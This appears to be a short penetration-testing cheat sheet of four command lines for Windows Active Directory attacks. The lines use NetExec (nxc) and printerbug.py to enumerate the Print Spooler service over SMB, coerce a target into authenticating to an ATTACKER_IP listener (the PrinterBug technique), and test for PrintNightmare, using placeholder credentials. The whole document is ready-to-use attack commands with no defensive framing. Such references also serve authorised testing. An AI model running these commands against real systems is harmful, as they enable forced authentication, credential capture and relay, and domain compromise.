nxc smb <ip> -u 'user' -p 'pass' -M spooler
nxc smb IP_RANGE -u username -p password -M printerbug -o LISTENER=ATTACKER_IP
printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'
nxc <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M spooler -M printnightmare